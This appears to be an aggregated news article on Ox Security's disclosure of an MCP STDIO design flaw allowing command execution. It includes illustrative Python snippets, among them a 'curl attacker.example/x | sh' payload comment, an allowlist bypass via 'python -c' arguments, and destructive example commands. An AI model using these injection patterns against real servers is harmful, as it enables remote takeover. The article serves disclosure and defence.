Anthropic's Model Context Protocol flaw threatens 200,000 servers with complete takeover


Security researchers from Ox have identified a critical architectural design flaw in Anthropic's Model Context Protocol that exposes over 200,000 servers to remote code execution attacks. The vulnerability affects software packages totaling more than 150 million downloads across Python, TypeScript, Java, and Rust implementations. Despite repeated requests to patch the root issue, Anthropic maintains the protocol's behavior is 'expected.'

Critical Security Vulnerability Discovered in Anthropic's Protocol

A fundamental security vulnerability in Anthropic's Model Context Protocol (MCP) has put as many as 200,000 servers at risk of complete takeover, according to Ox Security researchers. The issue stems from what the research team describes as an MCP design flaw rather than a simple coding error: an architectural design decision baked into the official SDK across Python, TypeScript, Java, and Rust [1]. The vulnerability enables remote code execution (RCE) on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories [2].

Source: Hacker News


The Ox research team, comprising Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok, and Roni Bar, says it repeatedly asked Anthropic to patch the root issue but was told the protocol works as intended. The company declined to modify the protocol's architecture, describing the behavior as 'expected' [1]. This decision has significant implications for the AI supply chain: any developer using Anthropic's official MCP software development kit inherits the vulnerability in every supported language [2].

Understanding the STDIO Transport Mechanism Flaw

The root cause lies in how MCP uses STDIO (standard input/output) as a local transport mechanism: an AI application spawns an MCP server as a subprocess. While the code was designed to start a local STDIO server and return a handle to the LLM, in practice it allows anyone who controls the command string to run arbitrary OS commands [1]. When given a command that successfully creates an STDIO server, the SDK returns the handle; when given any other command, it returns an error, but only after the command has already executed [2].
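The execute-first, fail-later pattern the researchers describe can be sketched as follows. This is a minimal illustration of the STDIO transport's spawn behavior, not the SDK's actual code; the function name and structure are assumptions for demonstration.

```python
import shlex
import subprocess


def start_stdio_server(command: str) -> subprocess.Popen:
    """Spawn an MCP server as a subprocess and return a handle to it.

    Illustrates the STDIO transport pattern: the command string is
    executed first, and only afterwards can the caller discover that it
    was not a real MCP server. Any OS command placed here will run.
    """
    proc = subprocess.Popen(
        shlex.split(command),  # the command is fully caller-controlled
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )
    return proc


# A benign configuration spawns a real server:
#   start_stdio_server("python my_mcp_server.py")
# But an attacker-supplied configuration executes arbitrary code:
#   start_stdio_server("touch /tmp/pwned")
# The process runs before any protocol handshake can fail.
```

Because the failure (no valid MCP handshake) is only detectable after the subprocess has started, validation after the spawn comes too late by design.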

This architectural flaw affects more than 7,000 publicly accessible servers and software packages totaling more than 150 million downloads [2]. The vulnerability has cascading effects across the AI ecosystem because MCP is the standard that lets AI tools connect to external data sources and applications, a component used by OpenAI, DeepMind, and Anthropic's own Claude apps [3].

Four Attack Vectors Threaten AI Infrastructure

Ox researchers identified four distinct vulnerability types that abuse this logic. The first is unauthenticated and authenticated command injection: user-controlled commands run directly on the server without authentication or sanitization, potentially leading to complete server takeover [1]. Vulnerable projects include all versions of LangFlow, IBM's open source low-code framework for building AI applications, and GPT Researcher, which has been assigned CVE-2025-65720 [1].
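A hypothetical sketch of how the first vector arises in practice (this is not LangFlow's or GPT Researcher's actual code): a service that forwards a request field straight into the STDIO spawn gives any unauthenticated caller command execution.

```python
import json
import shlex
import subprocess


def handle_connect(request_body: str) -> subprocess.Popen:
    """Hypothetical unauthenticated 'register an MCP server' handler.

    The caller-supplied command flows straight into a process spawn
    with no authentication, no sanitization, and no allowlist.
    """
    cfg = json.loads(request_body)
    return subprocess.Popen(
        shlex.split(cfg["command"]),
        stdout=subprocess.PIPE,
    )


# A request body of {"command": "curl attacker.example/x | sh"} would
# be executed with the service's privileges before any MCP handshake.
```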

The second attack vector enables unauthenticated command injection with hardening bypass, allowing attackers to circumvent protections implemented by developers. Both Upsonic (CVE-2026-30625) and Flowise (CVE-2026-40933) had hardened against command injection by allowing only certain commands such as 'python,' 'npm,' and 'npx,' but the researchers bypassed this by injecting commands indirectly through the allowed commands' arguments [1]. The third vulnerability type enables zero-click prompt injection across AI integrated development environments including Windsurf (CVE-2026-30615), Claude Code, Cursor, Gemini-CLI, and GitHub Copilot, though vendors including Google, Microsoft, and Anthropic said this was either a known issue or not a valid security vulnerability [1].
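The hardening bypass works because an executable-name allowlist still leaves the arguments attacker-controlled, and interpreters like 'python' or 'npx' will execute whatever their arguments tell them to. A minimal sketch of that naive check and its bypass (the allowlist and function names are assumptions, not the patched projects' code):

```python
import shlex
import subprocess
from typing import Optional

# Hypothetical hardening allowlist, as described for Upsonic and Flowise
ALLOWED = {"python", "npm", "npx"}


def is_allowed(command: str) -> bool:
    """Naive check: inspect only the executable name, never its arguments."""
    argv = shlex.split(command)
    return bool(argv) and argv[0] in ALLOWED


def spawn_if_allowed(command: str) -> Optional[subprocess.Popen]:
    """Spawn the command only if it passes the (insufficient) allowlist."""
    if not is_allowed(command):
        return None  # direct injection such as "rm -rf /" is rejected
    return subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE)


# The allowlist stops direct injection:
#   is_allowed("rm -rf /")  ->  False
# but an allowed interpreter smuggles arbitrary code in its arguments:
#   is_allowed("python -c 'import os; os.system(\"id\")'")  ->  True
```

Checking only `argv[0]` is the whole weakness: any allowlist that admits an interpreter effectively admits every program that interpreter can run.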

Supply Chain Implications and Industry Response

The research began in November 2025 and included more than 30 responsible disclosure processes, resulting in 10 high- and critical-severity CVE designations so far [1]. Affected projects include LiteLLM (CVE-2026-30623), Agent Zero (CVE-2026-30624), Fay Framework (CVE-2026-30618), Bisheng (CVE-2026-33224), Langchain-Chatchat (CVE-2026-30617), and DocsGPT (CVE-2026-26015), among others [2]. While some vendors have issued patches, the flaw remains unaddressed in Anthropic's MCP reference implementation, so developers continue to inherit the code execution risk [2].

Ox researchers also successfully poisoned nine of 11 MCP marketplaces with a proof of concept that runs a command creating an empty file. The marketplaces that accepted the submission include platforms with hundreds of thousands of monthly visitors, meaning a single malicious MCP entry could be installed by thousands of developers before detection [1]. A week after the initial report to Anthropic, the company quietly updated its security policy to state that MCP adapters, specifically STDIO ones, should be used with caution, a change the research team says 'didn't fix anything' [1].

What makes this a supply chain event rather than a single CVE is that one architectural decision, made once, propagated silently into every language, every downstream library, and every project that trusted the protocol. Ox Security emphasizes that shifting responsibility to implementers does not transfer the risk; it just obscures who created it [2]. To counter the threat, experts recommend blocking public IP access to sensitive services, monitoring MCP tool invocations, running MCP-enabled services in a sandbox, treating external MCP configuration input as untrusted, and installing MCP servers only from verified sources [2]. Anthropic did not respond to inquiries about the issue [1].
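One way to apply the "treat external MCP configuration as untrusted" recommendation is to approve exact argument vectors rather than bare executable names, which closes the interpreter-argument loophole described above. A minimal sketch under assumed names; the approved entries are placeholders a team would vet locally:

```python
import shlex
from typing import List

# Hypothetical vetted configurations: full argv tuples, not just binaries.
APPROVED_SERVERS = {
    ("python", "-m", "my_mcp_server"),   # assumed, locally audited entry
    ("npx", "@example/mcp-server"),      # assumed, from a verified source
}


def vet_server_command(command: str) -> List[str]:
    """Reject any command whose complete argv is not explicitly approved.

    Unlike an executable-name allowlist, this also pins the arguments,
    so 'python -c <anything>' cannot slip through.
    """
    argv = tuple(shlex.split(command))
    if argv not in APPROVED_SERVERS:
        raise ValueError(f"untrusted MCP server command: {command!r}")
    return list(argv)
```

This is a containment measure, not a fix for the protocol itself: it reduces what a poisoned marketplace entry or malicious configuration can spawn, but the underlying execute-before-validate behavior remains in the transport.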

Source: TechRadar


TheOutpost.ai

© 2026 Triveous Technologies Private Limited